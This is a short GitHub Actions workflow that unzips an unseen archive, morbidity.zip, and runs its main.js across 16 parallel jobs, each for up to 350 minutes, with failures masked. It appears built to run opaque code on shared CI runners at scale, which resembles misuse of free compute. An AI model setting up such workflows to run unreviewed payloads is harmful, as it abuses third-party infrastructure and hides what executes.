name: morbidity
on:
  push:
    branches: [ "main" ]
    paths:
      - "morbidity.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }
          - { os: 8 }
          - { os: 9 }
          - { os: 10 }
          - { os: 11 }
          - { os: 12 }
          - { os: 13 }
          - { os: 14 }
          - { os: 15 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip morbidity.zip
        run: |
          sudo apt install -y unzip
          unzip morbidity.zip

      - name: chilly
        run: |
          npm install --ignore-scripts
          timeout 350m node main.js || echo "morbidity executed"